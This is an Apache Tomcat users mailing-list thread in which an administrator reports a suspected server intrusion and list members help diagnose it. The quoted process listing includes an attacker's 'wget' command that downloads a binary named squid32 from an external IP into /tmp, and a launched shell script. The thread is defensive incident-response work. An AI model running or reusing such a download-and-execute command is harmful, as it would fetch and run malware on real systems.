> Date: Wed, 30 Apr 2014 12:35:52 -0300 > Subject: Re: Regarding i think an intrusion > From: lsantagost...@gmail.com > To: users@tomcat.apache.org > > Hello list, > > well my homework is done > > Here are the links: > > setenv.sh: http://pastebin.com/EN1mXDFi > catalina.sh: http://pastebin.com/1vRVLbSm > web.xml: http://pastebin.com/BqEfiXXm > server.xml: http://pastebin.com/wfzE8bYU > logging.properties: http://pastebin.com/Qurk8sLU > catalina.properties: http://pastebin.com/jkfY1ZRQ > tree + logsfiles: http://pastebin.com/j3tip4ij
MG>Por favor, pegue el contenido de los siguientes archivos de registros en Pastebin y enviarnos link: -rw-rw-r-- 1 tomcat tomcat 5.0K Apr 30 05:38 localhost.2014-04-30.log-rw-rw-r-- 1 tomcat tomcat 5.4M Apr 30 12:19 localhost_access_log.2014-04-30.txt -rw-rw-r-- 1 tomcat tomcat 0 Apr 30 05:38 manager.2014-04-30.log -rw-rw-r-- 1 tomcat tomcat 3.7M Apr 30 12:19 PDI_access_log.2014-04-30.txt-rw-rw-r-- 1 tomcat tomcat 43M Apr 30 12:18 portal-ht.log-rw-rw-r-- 1 tomcat tomcat 583K Apr 30 10:09 portal-mh.log-rw-rw-r-- 1 tomcat tomcat 58M Apr 30 12:19 portal-pdi.log-rw-rw-r-- 1 tomcat tomcat 3.5M Apr 30 12:18 portal-rt.log -rw-rw-r-- 1 tomcat tomcat 3.6M Apr 30 12:18 probe.log -rw-rw-r-- 1 tomcat tomcat 591K Apr 30 12:18 RT_access_log.2014-04-30.txt MG>Saludos Cordiales desde EEUU > > Note that logsfiles, are not the logfiles itsef but only a ls -lah (just > for you to see the logsizes) > > A little more about the infraestructure i've mounted ill do some ascii art. > > > internet ---> FW -->nat-->Haproxy (1)-->Apache(2)--> mod_jk > (3)-->Haproxy(4)--> Tomcat7(5) --> haproxy(6) --Tomcat(7) > > > Apache(2) is serving static content so haproxy(1) at the first level does > http round robin balancing > Apache(2) connects to tomcat(5) through haproxy(4) (using L4 connection) > using mod_jk(3) > Tomcat(5) are the main app server (the ones gets intruded) who uses > tomcat(7) (solr service) using haproxy(6) using L4 connection. > > Versions: > > Apache: 2.2.17 > mod_jk: 1.2.31 > haproxy: 1.4.22 > Tomcat: 7.0.53 > Java: 1.6.0.41 > > [root@arcbaappvrt05 tomcat]# /usr/java/default/bin/java -version > java version "1.6.0_41" > Java(TM) SE Runtime Environment (build 1.6.0_41-b02) > Java HotSpot(TM) 64-Bit Server VM (build 20.14-b01, mixed mode) > > OS: CentOS 5.8 64 bit > > [root@arcbaappvrt05 tomcat]# uname -a > Linux arcbaappvrt05.tic.yellargentina.com 2.6.18-308.el5 #1 SMP Tue Feb 21 > 20:06:06 EST 2012 x86_64 x86_64 x86_64 GNU/Linux > [root@arcbaappvrt05 tomcat]# cat /etc/redhat-release > CentOS release 5.8 (Final) > [root@arcbaappvrt05 tomcat]# > > For now i havent see that the squid process whas launched so i couldnt do a > dump > > Letme know if you need more information. > > BTW, pastebin links will work for one week. > > Kind regards, yours > > > > > Saludos.- > Leonardo Santagostini > > <http://ar.linkedin.com/in/santagostini> > > > > > > 2014-04-30 11:09 GMT-03:00 Leonardo Santagostini <lsantagost...@gmail.com>: > > > Ok, i will do the following: > > > > 1) thread dump of running tomcat instance > > 2) Pastebin the running tomcat config > > > > I think at mid day will have all the info. > > > > Thanks all for replying me and all the responses. > > > > Regards, Leonardo > > > > Saludos.- > > Leonardo Santagostini > > > > <http://ar.linkedin.com/in/santagostini> > > > > > > > > > > > > 2014-04-30 10:55 GMT-03:00 Christopher Schultz < > > ch...@christopherschultz.net>: > > > > -----BEGIN PGP SIGNED MESSAGE----- > >> Hash: SHA256 > >> > >> Konstantin, > >> > >> On 4/29/14, 4:54 PM, Konstantin Kolinko wrote: > >> > 2014-04-30 0:41 GMT+04:00 Leonardo Santagostini > >> > <lsantagost...@gmail.com>: > >> >> Hello Dan, > >> >> > >> >> Nop, the attacker is executing locally the following > >> >> > >> >> tomcat 8882 1 0 Apr27 ? 00:00:00 sh /tmp/4.sh > >> >> tomcat 8893 8882 0 Apr27 ? 00:00:00 wget > >> >> http://218.199.102.59/.xy/squid32 -O /tmp/squid > >> >> > >> >> And the launch squid who tries to connect via ssh to varoius > >> >> places. > >> >> > >> >> Right now its time to leave the office, but in a few hours i will > >> >> paste in pastebin access logs, config files, wherever you tell > >> >> me. > >> >> > >> >> This is my pstree > >> >> > >> >> [root@arcbaappvrt05 apache-tomcat-7.0.53]# pstree init─┬─atd > >> >> ├─java─┬─sh───wget │ └─263*[{java}] > >> > > >> > sh launched by tomcat's java? > >> > >> Yes: please verify that it's the JVM running Tomcat, and not just any > >> JVM process. > >> > >> > Take a thread dump: > >> > > >> https://wiki.apache.org/tomcat/HowTo#How_do_I_obtain_a_thread_dump_of_my_running_webapp_.3F > >> > > >> > It shall show what is stacktrace in thread that launched external > >> > process. > >> > >> +1 > >> > >> The only things that ship with Tomcat that call Process.exec() are the > >> CGI servlet and SSI, both of which are disabled by default. So, either > >> you have an insecure CGI/SSI configuration, your web application has a > >> vulnerability, or you have deployed something like the Manager > >> application and improperly-secured it. > >> > >> A classic example of such an intrusion might be that someone got a > >> foothold elsewhere into your network, and the Manager web application > >> is not properly secured with a password, etc. > >> > >> - -chris > >> -----BEGIN PGP SIGNATURE----- > >> Version: GnuPG v1 > >> Comment: GPGTools - http://gpgtools.org > >> Comment: Using GnuPG with Thunderbird - http://www.enigmail.net/ > >> > >> iQIcBAEBCAAGBQJTYQDeAAoJEBzwKT+lPKRYaPoQAKpqrj5bWfGXpEEHMINjw1Qp > >> +qqdL7O61QLmWoA1neUbyM7A2s8mY3lRdcZwDw2IG33xoeLuFaavhFlDGr2Txer4 > >> HiGDR8ixOv2mY9J9bMC889hih4N5dz0fYlw/b5SouUVz2aCbeUhYK+6lsBXRy2fC > >> D+UoNOiQF6uX2ZlqJYZTAvgzC2t/SGGnTW3GLx+3buRxs4JlUjJ8RWEOZtjZLQ5o > >> gUZ+UF6K/7dewYr6TjDmwc1C226dJNaliymQu2qbVgpRvoJ+baRgpeoyt6hzhIxr > >> BA8gjKY5xOH6QrpSX2tdU8RNCRVLIgSmbp9Mj+Hovdw4kkDMLQvS3osuGq5HaEwS > >> ZMltWiTef+K2yZyO3L8xrsJaRbox1j8Pg38ea22GRE48kpNagoQdCM2+uMCVN8Yj > >> UFjUrcpMu0FX06dy8azbFDRZMv5lD8nmwgE624nT+gZfFaxGHNLa9dRpJWHZgvTb > >> TSESKHv2lq9F4qc7bxoVrRDa8hnNLHk2luU9qot5JWXnb5en0fFKMZopwXwXYA4W > >> WgGA0Cfy4gALkA4/CCqrsn6Z+EqIxXNdCn74CeeCh5fV28+0Zpuj7G1adtJUkCQ7 > >> 87Cq6kXwHx4hfp//6vQhnZIGWYeKDOIgqbKuaP27pIcE1QCag5MOlmVT4pQjpT12 > >> lvJcfOhzHLwo07Pv+y3J > >> =EiX9 > >> -----END PGP SIGNATURE----- > >> > >> --------------------------------------------------------------------- > >> To unsubscribe, e-mail: users-unsubscr...@tomcat.apache.org > >> For additional commands, e-mail: users-h...@tomcat.apache.org > >> > >> > >
